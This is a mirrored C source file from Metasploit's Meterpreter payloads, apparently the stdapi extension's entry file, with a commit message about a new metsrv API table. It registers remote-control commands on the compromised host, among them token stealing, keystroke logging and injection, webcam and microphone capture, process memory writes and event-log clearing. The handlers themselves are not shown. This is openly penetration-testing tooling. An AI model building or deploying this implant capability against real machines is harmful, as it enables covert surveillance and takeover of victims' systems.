mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-05-12 19:04:32 +02:00

The 'common' library has been removed. The only project that actually used it was metsrv, so the code that metsrv required from common is now directly compiled in as part of that project. The common folder now contains files that are important across all of the projects, with a primary focus on the new "API" style function. What this means is that MetSrv has an API that it exposes through a function pointer that is passed to the extension when it's initialised. This pointer references a structure with all the API functions wired in. This means that: * Extensions don't need to know anything about metsrv at compile time. * The delay loading code can be removed, which was one of the last instances of "metsrv.dll" as a string. * Metsrv.dll no longer exports any functions. More to come.
/*
 * This module provides access to parts of the standard API of the
 * target machine (the "stdapi" extension).
 */
#include "precomp.h"
#include "common_metapi.h"

// The API table handed to this extension by metsrv in InitServerExtension.
// It stays NULL until then, so nothing that goes through met_api may run
// before the extension has been initialised.
MetApi* met_api = NULL;

// Including ReflectiveLoader.c here pulls in the ReflectiveLoader() function.
// That ends up linking back to metsrv.dll's Init function, which does not matter:
// DLL_METASPLOIT_ATTACH is only used by the second-stage reflective DLL injection
// payload and never by metsrv itself when it loads extensions.
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"

// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor

// General
// Handler for the core channel-open request; it is defined elsewhere in the
// extension, hence the extern declaration here.
extern DWORD request_general_channel_open(Remote *remote, Packet *packet);
/*
 * Dispatch table for every command the stdapi extension handles.
 *
 * Each COMMAND_REQ entry pairs a command name string with the local handler
 * function for that request. The table is passed to
 * met_api->command.register_all() in InitServerExtension and to
 * met_api->command.deregister_all() in DeinitServerExtension; its final
 * element must remain COMMAND_TERMINATOR, which marks the end of the table.
 */
Command customCommands[] =
{
	// General
	COMMAND_REQ("core_channel_open", request_general_channel_open),

	// Railgun
	COMMAND_REQ("stdapi_railgun_api", request_railgun_api),
	COMMAND_REQ("stdapi_railgun_api_multi", request_railgun_api_multi),
	COMMAND_REQ("stdapi_railgun_memread", request_railgun_memread),
	COMMAND_REQ("stdapi_railgun_memwrite", request_railgun_memwrite),

	// Fs
	COMMAND_REQ("stdapi_fs_ls", request_fs_ls),
	COMMAND_REQ("stdapi_fs_getwd", request_fs_getwd),
	COMMAND_REQ("stdapi_fs_chdir", request_fs_chdir),
	COMMAND_REQ("stdapi_fs_mkdir", request_fs_mkdir),
	COMMAND_REQ("stdapi_fs_delete_dir", request_fs_delete_dir),
	COMMAND_REQ("stdapi_fs_delete_file", request_fs_delete_file),
	COMMAND_REQ("stdapi_fs_separator", request_fs_separator),
	COMMAND_REQ("stdapi_fs_stat", request_fs_stat),
	COMMAND_REQ("stdapi_fs_file_expand_path", request_fs_file_expand_path),
	COMMAND_REQ("stdapi_fs_file_move", request_fs_file_move),
	COMMAND_REQ("stdapi_fs_file_copy", request_fs_file_copy),
	COMMAND_REQ("stdapi_fs_md5", request_fs_md5),
	COMMAND_REQ("stdapi_fs_sha1", request_fs_sha1),
	COMMAND_REQ("stdapi_fs_search", request_fs_search),
	COMMAND_REQ("stdapi_fs_mount_show", request_fs_mount_show),

	// Process
	COMMAND_REQ("stdapi_sys_process_attach", request_sys_process_attach),
	COMMAND_REQ("stdapi_sys_process_close", request_sys_process_close),
	COMMAND_REQ("stdapi_sys_process_execute", request_sys_process_execute),
	COMMAND_REQ("stdapi_sys_process_kill", request_sys_process_kill),
	COMMAND_REQ("stdapi_sys_process_get_processes", request_sys_process_get_processes),
	COMMAND_REQ("stdapi_sys_process_getpid", request_sys_process_getpid),
	COMMAND_REQ("stdapi_sys_process_get_info", request_sys_process_get_info),
	COMMAND_REQ("stdapi_sys_process_wait", request_sys_process_wait),

	// Image
	COMMAND_REQ("stdapi_sys_process_image_load", request_sys_process_image_load),
	COMMAND_REQ("stdapi_sys_process_image_get_proc_address", request_sys_process_image_get_proc_address),
	COMMAND_REQ("stdapi_sys_process_image_unload", request_sys_process_image_unload),
	COMMAND_REQ("stdapi_sys_process_image_get_images", request_sys_process_image_get_images),

	// Memory
	COMMAND_REQ("stdapi_sys_process_memory_allocate", request_sys_process_memory_allocate),
	COMMAND_REQ("stdapi_sys_process_memory_free", request_sys_process_memory_free),
	COMMAND_REQ("stdapi_sys_process_memory_read", request_sys_process_memory_read),
	COMMAND_REQ("stdapi_sys_process_memory_write", request_sys_process_memory_write),
	COMMAND_REQ("stdapi_sys_process_memory_query", request_sys_process_memory_query),
	COMMAND_REQ("stdapi_sys_process_memory_protect", request_sys_process_memory_protect),
	COMMAND_REQ("stdapi_sys_process_memory_lock", request_sys_process_memory_lock),
	COMMAND_REQ("stdapi_sys_process_memory_unlock", request_sys_process_memory_unlock),

	// Thread
	COMMAND_REQ("stdapi_sys_process_thread_open", request_sys_process_thread_open),
	COMMAND_REQ("stdapi_sys_process_thread_create", request_sys_process_thread_create),
	COMMAND_REQ("stdapi_sys_process_thread_close", request_sys_process_thread_close),
	COMMAND_REQ("stdapi_sys_process_thread_get_threads", request_sys_process_thread_get_threads),
	COMMAND_REQ("stdapi_sys_process_thread_suspend", request_sys_process_thread_suspend),
	COMMAND_REQ("stdapi_sys_process_thread_resume", request_sys_process_thread_resume),
	COMMAND_REQ("stdapi_sys_process_thread_terminate", request_sys_process_thread_terminate),
	COMMAND_REQ("stdapi_sys_process_thread_query_regs", request_sys_process_thread_query_regs),
	COMMAND_REQ("stdapi_sys_process_thread_set_regs", request_sys_process_thread_set_regs),

	// Registry
	COMMAND_REQ("stdapi_registry_check_key_exists", request_registry_check_key_exists),
	COMMAND_REQ("stdapi_registry_load_key", request_registry_load_key),
	COMMAND_REQ("stdapi_registry_unload_key", request_registry_unload_key),
	COMMAND_REQ("stdapi_registry_open_key", request_registry_open_key),
	COMMAND_REQ("stdapi_registry_open_remote_key", request_registry_open_remote_key),
	COMMAND_REQ("stdapi_registry_create_key", request_registry_create_key),
	COMMAND_REQ("stdapi_registry_enum_key", request_registry_enum_key),
	COMMAND_REQ("stdapi_registry_delete_key", request_registry_delete_key),
	COMMAND_REQ("stdapi_registry_close_key", request_registry_close_key),
	COMMAND_REQ("stdapi_registry_set_value", request_registry_set_value),
	COMMAND_REQ("stdapi_registry_query_value", request_registry_query_value),
	COMMAND_REQ("stdapi_registry_query_class", request_registry_query_class),
	COMMAND_REQ("stdapi_registry_enum_value", request_registry_enum_value),
	COMMAND_REQ("stdapi_registry_delete_value", request_registry_delete_value),
	COMMAND_REQ("stdapi_registry_enum_key_direct", request_registry_enum_key_direct),
	COMMAND_REQ("stdapi_registry_enum_value_direct", request_registry_enum_value_direct),
	COMMAND_REQ("stdapi_registry_query_value_direct", request_registry_query_value_direct),
	COMMAND_REQ("stdapi_registry_set_value_direct", request_registry_set_value_direct),

	// Sys/config
	COMMAND_REQ("stdapi_sys_config_getuid", request_sys_config_getuid),
	COMMAND_REQ("stdapi_sys_config_localtime", request_sys_config_localtime),
	COMMAND_REQ("stdapi_sys_config_sysinfo", request_sys_config_sysinfo),
	COMMAND_REQ("stdapi_sys_config_rev2self", request_sys_config_rev2self),
	COMMAND_REQ("stdapi_sys_config_getprivs", request_sys_config_getprivs),
	COMMAND_REQ("stdapi_sys_config_getenv", request_sys_config_getenv),
	COMMAND_REQ("stdapi_sys_config_driver_list", request_sys_config_driver_list),
	COMMAND_REQ("stdapi_sys_config_steal_token", request_sys_config_steal_token),
	COMMAND_REQ("stdapi_sys_config_drop_token", request_sys_config_drop_token),
	COMMAND_REQ("stdapi_sys_config_getsid", request_sys_config_getsid),

	// Net
	COMMAND_REQ("stdapi_net_config_get_routes", request_net_config_get_routes),
	COMMAND_REQ("stdapi_net_config_add_route", request_net_config_add_route),
	COMMAND_REQ("stdapi_net_config_remove_route", request_net_config_remove_route),
	COMMAND_REQ("stdapi_net_config_get_interfaces", request_net_config_get_interfaces),
	COMMAND_REQ("stdapi_net_config_get_arp_table", request_net_config_get_arp_table),
	COMMAND_REQ("stdapi_net_config_get_netstat", request_net_config_get_netstat),

	// Proxy
	COMMAND_REQ("stdapi_net_config_get_proxy", request_net_config_get_proxy_config),
	// Resolve
	COMMAND_REQ("stdapi_net_resolve_host", request_resolve_host),
	COMMAND_REQ("stdapi_net_resolve_hosts", request_resolve_hosts),

	// Socket
	COMMAND_REQ("stdapi_net_socket_tcp_shutdown", request_net_socket_tcp_shutdown),

	// UI
	COMMAND_REQ("stdapi_ui_enable_mouse", request_ui_enable_mouse),
	COMMAND_REQ("stdapi_ui_enable_keyboard", request_ui_enable_keyboard),
	COMMAND_REQ("stdapi_ui_get_idle_time", request_ui_get_idle_time),
	COMMAND_REQ("stdapi_ui_start_keyscan", request_ui_start_keyscan),
	COMMAND_REQ("stdapi_ui_stop_keyscan", request_ui_stop_keyscan),
	COMMAND_REQ("stdapi_ui_get_keys", request_ui_get_keys),
	COMMAND_REQ("stdapi_ui_get_keys_utf8", request_ui_get_keys_utf8),
	COMMAND_REQ("stdapi_ui_desktop_enum", request_ui_desktop_enum),
	COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get),
	COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set),
	COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot),
	COMMAND_REQ("stdapi_ui_send_keys", request_ui_send_keys),
	COMMAND_REQ("stdapi_ui_send_keyevent", request_ui_send_keyevent),
	COMMAND_REQ("stdapi_ui_send_mouse", request_ui_send_mouse),

	// Event Log
	COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open),
	COMMAND_REQ("stdapi_sys_eventlog_numrecords", request_sys_eventlog_numrecords),
	COMMAND_REQ("stdapi_sys_eventlog_read", request_sys_eventlog_read),
	COMMAND_REQ("stdapi_sys_eventlog_oldest", request_sys_eventlog_oldest),
	COMMAND_REQ("stdapi_sys_eventlog_clear", request_sys_eventlog_clear),
	COMMAND_REQ("stdapi_sys_eventlog_close", request_sys_eventlog_close),

	// Power
	COMMAND_REQ("stdapi_sys_power_exitwindows", request_sys_power_exitwindows),

	// Webcam
	COMMAND_REQ("webcam_list", request_webcam_list),
	COMMAND_REQ("webcam_start", request_webcam_start),
	COMMAND_REQ("webcam_get_frame", request_webcam_get_frame),
	COMMAND_REQ("webcam_stop", request_webcam_stop),

	// Audio
	// Note the command name is in the webcam_* family although the handler
	// lives with the UI code.
	COMMAND_REQ("webcam_audio_record", request_ui_record_mic),

	// End-of-table marker; must stay the last element.
	COMMAND_TERMINATOR
};
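/*!
 * @brief Initialize the server extension.
 * @param api Pointer to the API table exposed by metsrv; it is stored in the
 *            file-level \c met_api and used for all further API calls.
 * @param remote Pointer to the remote instance (unused here).
 * @return ERROR_SUCCESS on success, ERROR_INVALID_PARAMETER if \c api is NULL.
 */
DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote *remote)
{
	(void)remote;

	// The API table is this extension's only link to metsrv; without it the
	// command table cannot be registered, so refuse rather than dereference NULL.
	if (api == NULL)
	{
		return ERROR_INVALID_PARAMETER;
	}

	met_api = api;

	met_api->command.register_all(customCommands);

	return ERROR_SUCCESS;
}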
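/*!
 * @brief Deinitialize the server extension.
 * @param remote Pointer to the remote instance (unused here).
 * @return ERROR_SUCCESS; also when the extension was never initialised,
 *         in which case there is nothing to deregister.
 */
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
	(void)remote;

	// met_api is only assigned by InitServerExtension. If that never ran there
	// is no registration to undo, and dereferencing the NULL pointer would crash.
	if (met_api == NULL)
	{
		return ERROR_SUCCESS;
	}

	met_api->command.deregister_all(customCommands);

	return ERROR_SUCCESS;
}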
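/*!
 * @brief Get the name of the extension.
 * @param buffer Pointer to the buffer to write the name to.
 * @param bufferSize Size of the \c buffer parameter, in characters.
 * @return ERROR_SUCCESS on success (the name is truncated to fit when the
 *         buffer is short, and always NUL-terminated), ERROR_INVALID_PARAMETER
 *         if \c buffer is NULL or \c bufferSize is not positive, or
 *         ERROR_INSUFFICIENT_BUFFER if the copy itself fails.
 */
DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
{
	// Validate the destination here instead of handing a NULL or zero-sized
	// buffer to strncpy_s, which reports that through the CRT invalid-parameter
	// handler rather than as an ordinary error return.
	if (buffer == NULL || bufferSize <= 0)
	{
		return ERROR_INVALID_PARAMETER;
	}

	// Copy at most bufferSize - 1 characters so a terminator always fits;
	// a short buffer receives a truncated name rather than an error.
	if (strncpy_s(buffer, bufferSize, "stdapi", bufferSize - 1) != 0)
	{
		return ERROR_INSUFFICIENT_BUFFER;
	}

	return ERROR_SUCCESS;
}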